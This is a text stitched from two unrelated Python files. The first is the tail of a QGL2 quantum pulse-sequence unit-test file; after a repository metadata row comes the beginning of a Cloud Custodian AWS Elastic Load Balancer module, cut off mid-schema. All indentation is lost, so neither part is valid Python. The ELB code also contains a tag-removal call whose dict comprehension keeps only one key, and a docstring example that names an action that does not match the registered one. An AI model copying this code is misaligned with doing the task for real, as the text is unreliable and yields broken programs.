resFunction = compile_function("src/python/qgl2/basic_sequences/Decoupling.py",
"HahnEcho",
(qr, pulseSpacings, periods, calRepeats))
seqs = resFunction()
seqs = testable_sequence(seqs)
# import ipdb; ipdb.set_trace()
assertPulseSequenceEqual(self, seqs, expectedseq)
def test_CPMG(self):
q = QubitFactory('q1')
qr = QRegister('q1')
# Create numPulses sequences
numPulses = [0, 2, 4, 6]
pulseSpacing = 500e-9
pulseSpacingDiff = pulseSpacing - q.pulse_params['length']
calRepeats = 2
def addt180t(q, pulseSpacingDiff, rep):
t180t = []
for _ in range(rep):
t180t += [
Id(q, pulseSpacingDiff/2),
Y(q),
Id(q, pulseSpacingDiff/2)
]
return t180t
expectedseq = []
for rep in numPulses:
expectedseq += [
qwait(channels=(q,)),
X90(q)
]
expectedseq += addt180t(q, pulseSpacingDiff, rep)
expectedseq += [
X90(q),
MEAS(q)
]
# Add calibration
cal = get_cal_seqs_1qubit(q, calRepeats)
expectedseq += cal
expectedseq = testable_sequence(expectedseq)
resFunction = compile_function("src/python/qgl2/basic_sequences/Decoupling.py",
"CPMG",
(qr, numPulses, pulseSpacing, calRepeats))
seqs = resFunction()
seqs = testable_sequence(seqs)
assertPulseSequenceEqual(self, seqs, expectedseq)
class TestFeedback(unittest.TestCase):
def setUp(self):
channel_setup()
# FIXME: Add tests for these once implemented
#def test_Reset(self);
# ("Reset", (q1, np.linspace(0, 5e-6, 11), 0, 2), "Reset"),
#def test_BitFlip3(self);
# ("BitFlip3", (q1, [0, 2, 4, 6], 500e-9, 2), "BitFlip"),
class TestFlipFlop(unittest.TestCase):
def setUp(self):
channel_setup()
def test_FlipFlop(self):
qubit = QubitFactory('q1')
qr = QRegister('q1')
dragParamSweep = np.linspace(0, 1, 11)
maxNumFFs = 10
def addFFSeqs(dragParam, maxNumFFs, qubit):
ffs = []
for rep in range(maxNumFFs):
ffs += [
qwait(channels=(qubit,)),
X90(qubit, dragScaling=dragParam)
]
for _ in range(rep):
ffs += [
X90(qubit, dragScaling=dragParam),
X90m(qubit, dragScaling=dragParam)
]
ffs += [
Y90(qubit, dragScaling=dragParam),
MEAS(qubit)
]
return ffs
expectedseq = []
for dragParam in dragParamSweep:
expectedseq += [
qwait(channels=(qubit,)),
Id(qubit),
MEAS(qubit)
]
expectedseq += addFFSeqs(dragParam, maxNumFFs, qubit)
expectedseq += [
qwait(channels=(qubit,)),
X(qubit),
MEAS(qubit)
]
resFunction = compile_function("src/python/qgl2/basic_sequences/FlipFlop.py",
"FlipFlop",
(qr, dragParamSweep, maxNumFFs))
seqs = resFunction()
seqs = testable_sequence(seqs)
assertPulseSequenceEqual(self, seqs, expectedseq)
# FIXME: Tests for this class are incomplete
class TestRB(unittest.TestCase):
def setUp(self):
channel_setup(doHW=True)
def test_SingleQubitRB(self):
q1 = QubitFactory('q1')
qr = QRegister(q1)
np.random.seed(20152606) # set seed for create_RB_seqs()
random.seed(20152606) # set seed for random.choice()
# Range below should be 1,7 but that takes too long; use 1,2 so it's quick
rbseqs = create_RB_seqs(1, 2**np.arange(1,2))
purity = True
add_cals = True
# Try copying in the basic QGL1 code
# Can't do it directly since that code doesn't return the
# sequence
# This isn't quite right; this is before adding the Waits for example
expectedseq = []
def testSingleQubitRB(qubit, rbseqs, purit=False, add_cal=True):
from QGL.Cliffords import clifford_seq
from QGL.BasicSequences.helpers import create_cal_seqs
from functools import reduce
import operator
seqsBis = []
op = [Id(qubit, length=0), Y90m(qubit), X90(qubit)]
for ct in range(3 if purit else 1):
for seq in rbseqs:
seqsBis.append(reduce(operator.add, [clifford_seq(c, qubit)
for c in seq]))
#append tomography pulse to measure purity
seqsBis[-1].append(op[ct])
#append measurement
seqsBis[-1].append(MEAS(qubit))
#Tack on the calibration sequences
if add_cal:
seqsBis += create_cal_seqs((qubit, ), 2)
return seqsBis
expectedseq = testSingleQubitRB(q1, rbseqs, purity, add_cals)
# Must reset the seeds because QGL1 used the prior values, to ensure QGL2 gets same values
np.random.seed(20152606) # set seed for create_RB_seqs()
random.seed(20152606) # set seed for random.choice()
resFunction = compile_function("src/python/qgl2/basic_sequences/RB.py",
"SingleQubitRB",
(qr, rbseqs, purity, add_cals))
seqs = resFunction()
seqs = testable_sequence(seqs)
# Run testable on the QGL1 to flatten the sequence of sequences
expectedseq = testable_sequence(expectedseq)
# Strip out the QGL2 Waits and Barriers that QGL1 doesn't have
seqs = stripWaitBarrier(seqs)
# self.maxDiff = None
assertPulseSequenceEqual(self, seqs, expectedseq)
def test_TwoQubitRB(self):
q1 = QubitFactory('q1')
q2 = QubitFactory('q2')
qr1 = QRegister(q1)
qr2 = QRegister(q2)
np.random.seed(20152606) # set seed for create_RB_seqs()
# Without this next seed, results differ run to run and QGL1 to QGL2
random.seed(20152606) # set seed for random.choice()
# Repeats below should be 16 but that takes too long; use 4 so it's quick
rbseqs = create_RB_seqs(2, [2, 4, 8, 16, 32], repeats=4)
add_cals = True
# Try copying in the basic QGL1 code
# Can't do it directly since that code doesn't return the
# sequence
# This isn't quite right; this is before adding the Waits for example
expectedseq = []
def testTwoQubitRB(q1, q2, rbseqs, add_cal=True):
from QGL.Cliffords import clifford_seq
from QGL.BasicSequences.helpers import create_cal_seqs
from functools import reduce
import operator
seqsBis = []
for seq in rbseqs:
seqsBis.append(reduce(operator.add, [clifford_seq(c, q2, q1)
for c in seq]))
#Add the measurement to all sequences
for seq in seqsBis:
# FIXME: Correct thing is doing these with * as below,
# But that differs from QGL2 version
# seq.append(MEAS(q1) * MEAS(q2))
seq.append(MEAS(q1))
seq.append(MEAS(q2))
#Tack on the calibration sequences
if add_cal:
seqsBis += create_cal_seqs((q1, q2), 2)
return seqsBis
expectedseq = testTwoQubitRB(q1, q2, rbseqs, add_cals)
# Must reset the seeds because QGL1 used the prior values, to ensure QGL2 gets same values
np.random.seed(20152606) # set seed for create_RB_seqs()
# Without this next seed, results differ run to run and QGL1 to QGL2
random.seed(20152606) # set seed for random.choice()
resFunction = compile_function("src/python/qgl2/basic_sequences/RB.py",
"TwoQubitRB",
(qr1, qr2, rbseqs, add_cals))
seqs = resFunction()
seqs = testable_sequence(seqs)
# Run testable on the QGL1 to flatten the sequence of sequences
expectedseq = testable_sequence(expectedseq)
# Strip out the QGL2 Waits and Barriers that QGL1 doesn't have
# Note that if you want to see the real sequence, don't do this
seqs = stripWaitBarrier(seqs)
# self.maxDiff = None
# Note: We expect the sequences to start differing around element 2110, due
# to PulseBlock vs list of pulses, given QGL2 uses Barrier;Pulse where QGL1 uses PulseBlock(pulse)
# (but that difference is harmless we think)
assertPulseSequenceEqual(self, seqs[:2110], expectedseq[:2110])
# assertPulseSequenceEqual(self, seqs, expectedseq)
def test_SingleQubitRB_AC(self):
q1 = QubitFactory('q1')
q2 = QubitFactory('q2')
qr1 = QRegister(q1)
qr2 = QRegister(q2)
np.random.seed(20152606) # set seed for create_RB_seqs()
rbseqs = create_RB_seqs(1, 2**np.arange(1,7))
add_cals = True
purity = False
# Try copying in the basic QGL1 code
# Can't do it directly since that code doesn't return the
# sequence
# This isn't quite right; this is before adding the Waits for example
expectedseq = []
def testSingleQubitRB_AC(qubit, seqs, purit=False, add_cal=True):
from QGL.PulsePrimitives import AC, MEAS, Id, Y90m, X90
from QGL.BasicSequences.helpers import create_cal_seqs
from functools import reduce
import operator
seqsBis = []
op = [Id(qubit, length=0), Y90m(qubit), X90(qubit)]
for ct in range(3 if purit else 1):
for seq in seqs:
seqsBis.append([AC(qubit, c) for c in seq])
# append tomography pulse to measure purity
seqsBis[-1].append(op[ct])
# append measurement
seqsBis[-1].append(MEAS(qubit))
# Tack on the calibration sequences
if add_cals:
seqsBis += create_cal_seqs((qubit, ), 2)
return seqsBis
expectedseq = testSingleQubitRB_AC(q1, rbseqs, purity, add_cals)
# Must reset the seeds because QGL1 used the prior values, to ensure QGL2 gets same values
np.random.seed(20152606) # set seed for create_RB_seqs()
resFunction = compile_function("src/python/qgl2/basic_sequences/RB.py",
"SingleQubitRB_AC",
(qr1, rbseqs, purity, add_cals))
seqs = resFunction()
seqs = testable_sequence(seqs)
# Run testable on the QGL1 to flatten the sequence of sequences
expectedseq = testable_sequence(expectedseq)
# Strip out the QGL2 Waits and Barriers that QGL1 doesn't have
# Note that if you want to see the real sequence, don't do this
seqs = stripWaitBarrier(seqs)
# self.maxDiff = None
assertPulseSequenceEqual(self, seqs, expectedseq)
def test_SimultaneousRB_AC(self):
q1 = QubitFactory('q1')
q2 = QubitFactory('q2')
qr1 = QRegister(q1)
qr2 = QRegister(q2)
qr = QRegister(q1, q2)
np.random.seed(20151709) # set seed for create_RB_seqs()
rbseqs = create_RB_seqs(1, 2**np.arange(1,7))
add_cals = True
# Try copying in the basic QGL1 code
# Can't do it directly since that code doesn't return the
# sequence
# This isn't quite right; this is before adding the Waits for example
expectedseq = []
def testSimultaneousRB_AC(qubits, seqs, add_cal=True):
from QGL.PulsePrimitives import AC, MEAS
from QGL.BasicSequences.helpers import create_cal_seqs
from functools import reduce
import operator
seqsBis = []
for seq in zip(*seqs):
seqsBis.append([reduce(operator.__mul__,
[AC(q, c) for q, c in zip(qubits, pulseNums)])
for pulseNums in zip(*seq)])
# Add the measurement to all sequences
for seq in seqsBis:
seq.append(reduce(operator.mul, [MEAS(q) for q in qubits]))
# Tack on the calibration sequences
if add_cal:
seqsBis += create_cal_seqs((qubits), 2)
return seqsBis
expectedseq = testSimultaneousRB_AC((q1, q2), (rbseqs, rbseqs), add_cals)
# Must reset the seeds because QGL1 used the prior values, to ensure QGL2 gets same values
np.random.seed(20151709) # set seed for create_RB_seqs()
resFunction = compile_function("src/python/qgl2/basic_sequences/RB.py",
"SimultaneousRB_AC",
(qr, (rbseqs, rbseqs), add_cals))
seqs = resFunction()
seqs = testable_sequence(seqs)
# Run testable on the QGL1 to flatten the sequence of sequences
expectedseq = testable_sequence(expectedseq)
# QGL2 generates Barrier, P(q1), P(q2), Barrier, ....
# where QGL1 does PulseBlock(P(q1) * P(q2))
# - these are equivalent, but look different.
# I could go thru QGL2, when I find a Barrier, grab all next Pulses up to next Barrier & put them in a PulseBlock?
# Here though, I take any PulseBlock in QGL1 and just list the Pulses
expectedseq = flattenPulseBlocks(expectedseq)
# Strip out the QGL2 Waits and Barriers that QGL1 doesn't have
# Note that if you want to see the real sequence, don't do this
seqs = stripWaitBarrier(seqs)
# self.maxDiff = None
assertPulseSequenceEqual(self, seqs, expectedseq)
# These RB functions are unlikely to be done:
# SingleQubitRB_DiAC (?)
# SingleQubitIRB_AC (needs a file of sequences that I don't have)
# Not this one that needs a specific file: SingleQubitRBT
class TestRabi(unittest.TestCase):
def setUp(self):
channel_setup()
def test_RabiAmp(self):
q1 = QubitFactory('q1')
qr = QRegister(q1)
amps = np.linspace(0, 1, 11)
phase = 0
expectedseq = []
for amp in amps:
expectedseq += [
qwait(channels=(q1,)),
Utheta(q1, amp=amp, phase=phase),
MEAS(q1)
]
resFunction = compile_function("src/python/qgl2/basic_sequences/Rabi.py",
"RabiAmp",
(qr, amps, phase))
seqs = resFunction()
seqs = testable_sequence(seqs)
assertPulseSequenceEqual(self, seqs, expectedseq)
# Note that QGL2 gives a warning printing the tanh function; harmless
def test_RabiWidth(self):
from QGL.PulseShapes import tanh
q1 = QubitFactory('q1')
qr = QRegister(q1)
widths = np.linspace(0, 5e-6, 11)
amp=1
phase=0
resFunction = compile_function("src/python/qgl2/basic_sequences/Rabi.py",
"RabiWidth",
(qr, widths, amp, phase, tanh))
seqs = resFunction()
seqs = testable_sequence(seqs)
expectedseq = []
for l in widths:
expectedseq += [
qwait(channels=(q1,)),
Utheta(q1, length=l, amp=amp, phase=phase, shape_fun=tanh),
MEAS(q1)
]
assertPulseSequenceEqual(self, seqs, expectedseq)
def test_RabiAmpPi(self):
q1 = QubitFactory('q1')
q2 = QubitFactory('q2')
qr1 = QRegister(q1)
qr2 = QRegister(q2)
amps = np.linspace(0, 1, 11)
phase=0
resFunction = compile_function("src/python/qgl2/basic_sequences/Rabi.py",
"RabiAmpPi",
(qr1, qr2, amps, phase))
seqs = resFunction()
seqs = testable_sequence(seqs)
expectedseq = []
for amp in amps:
expectedseq += [
qwait(channels=(q1,q2)),
X(q2),
Utheta(q1, amp=amp, phase=phase),
X(q2),
MEAS(q2)
]
assertPulseSequenceEqual(self, seqs, expectedseq)
def test_SingleShot(self):
q1 = QubitFactory('q1')
qr = QRegister(q1)
resFunction = compile_function("src/python/qgl2/basic_sequences/Rabi.py",
"SingleShot",
(qr,))
seqs = resFunction()
seqs = testable_sequence(seqs)
expectedseq = [
qwait(channels=(q1,)),
Id(q1),
MEAS(q1),
qwait(channels=(q1,)),
X(q1),
MEAS(q1)
]
assertPulseSequenceEqual(self, seqs, expectedseq)
def test_PulsedSpec(self):
q1 = QubitFactory('q1')
qr = QRegister(q1)
resFunction = compile_function("src/python/qgl2/basic_sequences/Rabi.py",
"PulsedSpec",
(qr, True))
seqs = resFunction()
seqs = testable_sequence(seqs)
expectedseq = [
qwait(channels=(q1,)),
X(q1),
MEAS(q1)
]
assertPulseSequenceEqual(self, seqs, expectedseq)
def test_RabiAmp_NQubits(self):
q1 = QubitFactory('q1')
q2 = QubitFactory('q2')
qr = QRegister(q1, q2)
amps = np.linspace(0, 5e-6, 11)
p = 0
docals = False
calRepeats = 2
expectedseq = []
for a in amps:
expectedseq += [
qwait(channels=(q1,q2)),
Utheta(q1, amp=a, phase=p),
Utheta(q2, amp=a, phase=p),
Barrier(q1, q2),
MEAS(q1),
MEAS(q2)
]
if docals:
# Add calibration
cal_seqs = get_cal_seqs_2qubits(q1, q2, calRepeats)
expectedseq += cal_seqs
expectedseq = testable_sequence(expectedseq)
resFunction = compile_function("src/python/qgl2/basic_sequences/Rabi.py",
"RabiAmp_NQubits",
(qr, amps, p, None, docals, calRepeats))
seqs = resFunction()
seqs = testable_sequence(seqs)
assertPulseSequenceEqual(self, seqs, expectedseq)
# Note this is not a QGL1 basic sequence any longer
def test_Swap(self):
q = QubitFactory('q1')
mq = QubitFactory('q2')
qr = QRegister(q)
mqr = QRegister(mq)
delays = np.linspace(0, 5e-6, 11)
expectedseq = []
for d in delays:
expectedseq += [
qwait(channels=(q, mq)),
X(q),
X(mq),
Id(mq, length=d),
Barrier(q, mq),
MEAS(q),
MEAS(mq)
]
# Add calibration
cal_seqs = get_cal_seqs_2qubits(q, mq, 2)
expectedseq += cal_seqs
expectedseq = testable_sequence(expectedseq)
resFunction = compile_function("src/python/qgl2/basic_sequences/Rabi.py",
"Swap",
(qr, delays, mqr))
seqs = resFunction()
seqs = testable_sequence(seqs)
assertPulseSequenceEqual(self, seqs, expectedseq)
class TestSPAM(unittest.TestCase):
def setUp(self):
channel_setup()
def test_SPAM(self):
q = QubitFactory('q1')
qr = QRegister('q1')
angleSweep = np.linspace(0, pi/2, 11)
maxSpamBlocks=10
expectedseq = []
def spam_seqs(angle, q, maxSpamBlocks):
thisseq = []
for rep in range(maxSpamBlocks):
thisseq += [
qwait(channels=(q,)),
Y90(q)
]
innerseq = []
for _ in range(rep):
innerseq += [
X(q),
U(q, phase=pi/2+angle),
X(q),
U(q, phase=pi/2+angle)
]
thisseq += innerseq
thisseq += [
X90(q),
MEAS(q)
]
return thisseq
for angle in angleSweep:
expectedseq += [
qwait(channels=(q,)),
Id(q),
MEAS(q)
]
expectedseq += spam_seqs(angle, q, maxSpamBlocks)
expectedseq += [
qwait(channels=(q,)),
X(q),
MEAS(q)
]
resFunction = compile_function("src/python/qgl2/basic_sequences/SPAM.py",
"SPAM",
(qr, angleSweep, maxSpamBlocks))
seqs = resFunction()
seqs = testable_sequence(seqs)
assertPulseSequenceEqual(self, seqs, expectedseq)
class TestT1T2(unittest.TestCase):
def setUp(self):
channel_setup()
def test_InversionRecovery(self):
q = QubitFactory('q1')
qr = QRegister('q1')
delays = np.linspace(0, 5e-6, 11)
calRepeats = 2
expectedseq = []
for d in delays:
expectedseq += [
qwait(channels=(q,)),
X(q),
Id(q, d),
MEAS(q)
]
# Add calibration
cal = get_cal_seqs_1qubit(q, calRepeats)
expectedseq += cal
expectedseq = testable_sequence(expectedseq)
resFunction = compile_function("src/python/qgl2/basic_sequences/T1T2.py",
"InversionRecovery",
(qr, delays, calRepeats))
seqs = resFunction()
seqs = testable_sequence(seqs)
assertPulseSequenceEqual(self, seqs, expectedseq)
def test_Ramsey(self):
q = QubitFactory('q1')
qr = QRegister('q1')
delays = np.arange(100e-9, 10e-6, 100e-9)
TPPIFreq = 1e6
calRepeats = 2
expectedseq = []
# Create the phases for the TPPI
phases = 2*pi*TPPIFreq*delays
# Create the basic Ramsey sequence
for d,phase in zip(delays, phases):
expectedseq += [
qwait(channels=(q,)),
X90(q),
Id(q, d),
U90(q, phase=phase),
MEAS(q)
]
# Add calibration
cal = get_cal_seqs_1qubit(q, calRepeats)
expectedseq += cal
expectedseq = testable_sequence(expectedseq)
resFunction = compile_function("src/python/qgl2/basic_sequences/T1T2.py",
"Ramsey",
(qr, delays, TPPIFreq, calRepeats))
seqs = resFunction()
seqs = testable_sequence(seqs)
assertPulseSequenceEqual(self, seqs, expectedseq)
if __name__ == '__main__':
# To test everything in this file (say, using cProfile)
# unittest.main("test.test_basic_mins")
# To run just 1 test from this file, try something like:
# unittest.main("test.test_basic_mins", "TestCR.test_PiRabi")
unittest.main("test.test_basic_mins", "TestAllXY.test_AllXY")
|
BBN-Q/pyqgl2
|
test/test_basic_mins.py
|
Python
|
apache-2.0
| 34,859 | 0.004131 |
# Copyright 2015-2017 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Elastic Load Balancers
"""
from __future__ import absolute_import, division, print_function, unicode_literals
from concurrent.futures import as_completed
import logging
import re
from botocore.exceptions import ClientError
from c7n.actions import ActionRegistry, BaseAction, ModifyVpcSecurityGroupsAction
from c7n.filters import (
Filter, FilterRegistry, FilterValidationError, DefaultVpcBase, ValueFilter,
ShieldMetrics)
import c7n.filters.vpc as net_filters
from datetime import datetime
from dateutil.tz import tzutc
from c7n import tags
from c7n.manager import resources
from c7n.query import QueryResourceManager, DescribeSource
from c7n.utils import local_session, chunks, type_schema, get_retry, worker
from c7n.resources.shield import IsShieldProtected, SetShieldProtection
log = logging.getLogger('custodian.elb')
filters = FilterRegistry('elb.filters')
actions = ActionRegistry('elb.actions')
actions.register('set-shield', SetShieldProtection)
filters.register('tag-count', tags.TagCountFilter)
filters.register('marked-for-op', tags.TagActionFilter)
filters.register('shield-enabled', IsShieldProtected)
filters.register('shield-metrics', ShieldMetrics)
@resources.register('elb')
class ELB(QueryResourceManager):
class resource_type(object):
service = 'elb'
type = 'loadbalancer'
enum_spec = ('describe_load_balancers',
'LoadBalancerDescriptions', None)
detail_spec = None
id = 'LoadBalancerName'
filter_name = 'LoadBalancerNames'
filter_type = 'list'
name = 'DNSName'
date = 'CreatedTime'
dimension = 'LoadBalancerName'
config_type = "AWS::ElasticLoadBalancing::LoadBalancer"
default_report_fields = (
'LoadBalancerName',
'DNSName',
'VPCId',
'count:Instances',
'list:ListenerDescriptions[].Listener.LoadBalancerPort')
filter_registry = filters
action_registry = actions
retry = staticmethod(get_retry(('Throttling',)))
@classmethod
def get_permissions(cls):
return ('elasticloadbalancing:DescribeLoadBalancers',
'elasticloadbalancing:DescribeLoadBalancerAttributes',
'elasticloadbalancing:DescribeTags')
def get_arn(self, r):
return "arn:aws:elasticloadbalancing:%s:%s:loadbalancer/%s" % (
self.config.region,
self.config.account_id,
r[self.resource_type.id])
def get_source(self, source_type):
if source_type == 'describe':
return DescribeELB(self)
return super(ELB, self).get_source(source_type)
class DescribeELB(DescribeSource):
def augment(self, resources):
_elb_tags(
resources,
self.manager.session_factory,
self.manager.executor_factory,
self.manager.retry)
return resources
def _elb_tags(elbs, session_factory, executor_factory, retry):
def process_tags(elb_set):
client = local_session(session_factory).client('elb')
elb_map = {elb['LoadBalancerName']: elb for elb in elb_set}
while True:
try:
results = retry(
client.describe_tags,
LoadBalancerNames=list(elb_map.keys()))
break
except ClientError as e:
if e.response['Error']['Code'] != 'LoadBalancerNotFound':
raise
msg = e.response['Error']['Message']
_, lb_name = msg.strip().rsplit(' ', 1)
elb_map.pop(lb_name)
if not elb_map:
results = {'TagDescriptions': []}
break
continue
for tag_desc in results['TagDescriptions']:
elb_map[tag_desc['LoadBalancerName']]['Tags'] = tag_desc['Tags']
with executor_factory(max_workers=2) as w:
list(w.map(process_tags, chunks(elbs, 20)))
@actions.register('mark-for-op')
class TagDelayedAction(tags.TagDelayedAction):
"""Action to specify an action to occur at a later date
:example:
.. code-block:: yaml
policies:
- name: elb-delete-unused
resource: elb
filters:
- "tag:custodian_cleanup": absent
- Instances: []
actions:
- type: mark-for-op
tag: custodian_cleanup
msg: "Unused ELB - No Instances: {op}@{action_date}"
op: delete
days: 7
"""
batch_size = 1
permissions = ('elasticloadbalancing:AddTags',)
def process_resource_set(self, resource_set, tags):
client = local_session(self.manager.session_factory).client('elb')
client.add_tags(
LoadBalancerNames=[r['LoadBalancerName'] for r in resource_set],
Tags=tags)
@actions.register('tag')
class Tag(tags.Tag):
"""Action to add tag(s) to ELB(s)
:example:
.. code-block:: yaml
policies:
- name: elb-add-owner-tag
resource: elb
filters:
- "tag:OwnerName": missing
actions:
- type: tag
key: OwnerName
value: OwnerName
"""
batch_size = 1
permissions = ('elasticloadbalancing:AddTags',)
def process_resource_set(self, resource_set, tags):
client = local_session(
self.manager.session_factory).client('elb')
client.add_tags(
LoadBalancerNames=[r['LoadBalancerName'] for r in resource_set],
Tags=tags)
@actions.register('remove-tag')
class RemoveTag(tags.RemoveTag):
"""Action to remove tag(s) from ELB(s)
:example:
.. code-block:: yaml
policies:
- name: elb-remove-old-tag
resource: elb
filters:
- "tag:OldTagKey": present
actions:
- type: remove-tag
tags: [OldTagKey1, OldTagKey2]
"""
batch_size = 1
permissions = ('elasticloadbalancing:RemoveTags',)
def process_resource_set(self, resource_set, tag_keys):
client = local_session(
self.manager.session_factory).client('elb')
client.remove_tags(
LoadBalancerNames=[r['LoadBalancerName'] for r in resource_set],
Tags=[{'Key': k for k in tag_keys}])
@actions.register('delete')
class Delete(BaseAction):
"""Action to delete ELB(s)
It is recommended to apply a filter to the delete policy to avoid unwanted
deletion of any load balancers.
:example:
.. code-block:: yaml
policies:
- name: elb-delete-unused
resource: elb
filters:
- Instances: []
actions:
- delete
"""
schema = type_schema('delete')
permissions = ('elasticloadbalancing:DeleteLoadBalancer',)
def process(self, load_balancers):
with self.executor_factory(max_workers=2) as w:
list(w.map(self.process_elb, load_balancers))
def process_elb(self, elb):
client = local_session(self.manager.session_factory).client('elb')
self.manager.retry(
client.delete_load_balancer,
LoadBalancerName=elb['LoadBalancerName'])
@actions.register('set-ssl-listener-policy')
class SetSslListenerPolicy(BaseAction):
"""Action to set the ELB SSL listener policy
:example:
.. code-block:: yaml
policies:
- name: elb-set-listener-policy
resource: elb
actions:
- type: set-ssl-listener-policy
name: SSLNegotiation-Policy-01
attributes:
- Protocol-SSLv3
- Protocol-TLSv1.1
- DHE-RSA-AES256-SHA256
"""
schema = type_schema(
'set-ssl-listener-policy',
name={'type': 'string'},
attributes={'type': 'array', 'items': {'type': 'string'}},
required=['name', 'attributes'])
permissions = (
'elasticloadbalancing:CreateLoadBalancerPolicy',
'elasticloadbalancing:SetLoadBalancerPoliciesOfListener')
def process(self, load_balancers):
with self.executor_factory(max_workers=3) as w:
list(w.map(self.process_elb, load_balancers))
@worker
def process_elb(self, elb):
if not is_ssl(elb):
return
client = local_session(self.manager.session_factory).client('elb')
# Create a custom policy with epoch timestamp.
# to make it unique within the
# set of policies for this load balancer.
policy_name = self.data.get('name') + '-' + \
str(int(datetime.now(tz=tzutc()).strftime("%s")) * 1000)
lb_name = elb['LoadBalancerName']
attrs = self.data.get('attributes')
policy_attributes = [{'AttributeName': attr, 'AttributeValue': 'true'}
for attr in attrs]
try:
client.create_load_balancer_policy(
LoadBalancerName=lb_name,
PolicyName=policy_name,
PolicyTypeName='SSLNegotiationPolicyType',
PolicyAttributes=policy_attributes)
except ClientError as e:
if e.response['Error']['Code'] not in (
'DuplicatePolicyName', 'DuplicatePolicyNameException',
'DuplicationPolicyNameException'):
raise
# Apply it to all SSL listeners.
ssl_policies = ()
if 'c7n.ssl-policies' in elb:
ssl_policies = elb['c7n.ssl-policies']
for ld in elb['ListenerDescriptions']:
if ld['Listener']['Protocol'] in ('HTTPS', 'SSL'):
policy_names = [policy_name]
# Preserve extant non-ssl listener policies
policy_names.extend(ld.get('PolicyNames', ()))
# Remove extant ssl listener policy
if ssl_policies:
policy_names = list(set(policy_names).difference(ssl_policies))
client.set_load_balancer_policies_of_listener(
LoadBalancerName=lb_name,
LoadBalancerPort=ld['Listener']['LoadBalancerPort'],
PolicyNames=policy_names)
@actions.register('modify-security-groups')
class ELBModifyVpcSecurityGroups(ModifyVpcSecurityGroupsAction):
"""Modify VPC security groups on an ELB."""
permissions = ('elasticloadbalancing:ApplySecurityGroupsToLoadBalancer',)
def process(self, load_balancers):
client = local_session(self.manager.session_factory).client('elb')
groups = super(ELBModifyVpcSecurityGroups, self).get_groups(
load_balancers, 'SecurityGroups')
for idx, l in enumerate(load_balancers):
client.apply_security_groups_to_load_balancer(
LoadBalancerName=l['LoadBalancerName'],
SecurityGroups=groups[idx])
@actions.register('enable-s3-logging')
class EnableS3Logging(BaseAction):
"""Action to enable S3 logging for Elastic Load Balancers.
:example:
.. code-block:: yaml
policies:
- name: elb-test
resource: app-elb
filters:
- type: is-not-logging
actions:
- type: enable-s3-logging
bucket: elblogtest
prefix: dahlogs
emit_interval: 5
"""
schema = type_schema('enable-s3-logging',
bucket={'type': 'string'},
prefix={'type': 'string'},
emit_interval={'type': 'integer'},
)
permissions = ("elasticloadbalancing:ModifyLoadBalancerAttributes",)
def process(self, resources):
client = local_session(self.manager.session_factory).client('elb')
for elb in resources:
elb_name = elb['LoadBalancerName']
log_attrs = {'Enabled':True}
if 'bucket' in self.data:
log_attrs['S3BucketName'] = self.data['bucket']
if 'prefix' in self.data:
log_attrs['S3BucketPrefix'] = self.data['prefix']
if 'emit_interval' in self.data:
log_attrs['EmitInterval'] = self.data['emit_interval']
client.modify_load_balancer_attributes(LoadBalancerName=elb_name,
LoadBalancerAttributes={
'AccessLog': log_attrs
})
return resources
@actions.register('disable-s3-logging')
class DisableS3Logging(BaseAction):
"""Disable s3 logging for ElasticLoadBalancers.
:example:
.. code-block:: yaml
policies:
- name: turn-off-elb-logs
resource: elb
filters:
- type: is-logging
bucket: prodbucket
actions:
- type: disable-elb-logging
"""
schema = type_schema('disable-s3-logging')
permissions = ("elasticloadbalancing:ModifyLoadBalancerAttributes",)
def process(self, resources):
client = local_session(self.manager.session_factory).client('elb')
for elb in resources:
elb_name = elb['LoadBalancerName']
client.modify_load_balancer_attributes(LoadBalancerName=elb_name,
LoadBalancerAttributes={
'AccessLog': {
'Enabled': False}
})
return resources
def is_ssl(b):
for ld in b['ListenerDescriptions']:
if ld['Listener']['Protocol'] in ('HTTPS', 'SSL'):
return True
return False
@filters.register('security-group')
class SecurityGroupFilter(net_filters.SecurityGroupFilter):
"""ELB security group filter"""
RelatedIdsExpression = "SecurityGroups[]"
@filters.register('subnet')
class SubnetFilter(net_filters.SubnetFilter):
"""ELB subnet filter"""
RelatedIdsExpression = "Subnets[]"
filters.register('network-location', net_filters.NetworkLocation)
@filters.register('instance')
class Instance(ValueFilter):
"""Filter ELB by an associated instance value(s)
:example:
.. code-block:: yaml
policies:
- name: elb-image-filter
resource: elb
filters:
- type: instance
key: ImageId
value: ami-01ab23cd
"""
schema = type_schema('instance', rinherit=ValueFilter.schema)
annotate = False
def get_permissions(self):
return self.manager.get_resource_manager('ec2').get_permissions()
def process(self, resources, event=None):
self.elb_instances = {}
instances = []
for r in resources:
instances.extend([i['InstanceId'] for i in r['Instances']])
for i in self.manager.get_resource_manager(
'ec2').get_resources(list(instances)):
self.elb_instances[i['InstanceId']] = i
return super(Instance, self).process(resources, event)
def __call__(self, elb):
matched = []
for i in elb['Instances']:
instance = self.elb_instances[i['InstanceId']]
if self.match(instance):
matched.append(instance)
if not matched:
return False
elb['c7n:MatchedInstances'] = matched
return True
@filters.register('is-ssl')
class IsSSLFilter(Filter):
"""Filters ELB that are using a SSL policy
:example:
.. code-block:: yaml
policies:
- name: elb-using-ssl
resource: elb
filters:
- type: is-ssl
"""
schema = type_schema('is-ssl')
def process(self, balancers, event=None):
return [b for b in balancers if is_ssl(b)]
@filters.register('ssl-policy')
class SSLPolicyFilter(Filter):
"""Filter ELBs on the properties of SSLNegotation policies.
TODO: Only works on custom policies at the moment.
whitelist: filter all policies containing permitted protocols
blacklist: filter all policies containing forbidden protocols
Cannot specify both whitelist & blacklist in the same policy. These must
be done seperately (seperate policy statements).
Likewise, if you want to reduce the consideration set such that we only
compare certain keys (e.g. you only want to compare the `Protocol-` keys),
you can use the `matching` option with a regular expression:
:example:
.. code-block:: yaml
policies:
- name: elb-ssl-policies
resource: elb
filters:
- type: ssl-policy
blacklist:
- "Protocol-SSLv2"
- "Protocol-SSLv3"
- name: elb-modern-tls
resource: elb
filters:
- type: ssl-policy
matching: "^Protocol-"
whitelist:
- "Protocol-TLSv1.1"
- "Protocol-TLSv1.2"
"""
schema = {
'type': 'object',
'additionalProperties': False,
'oneOf': [
{'required': ['type', 'whitelist']},
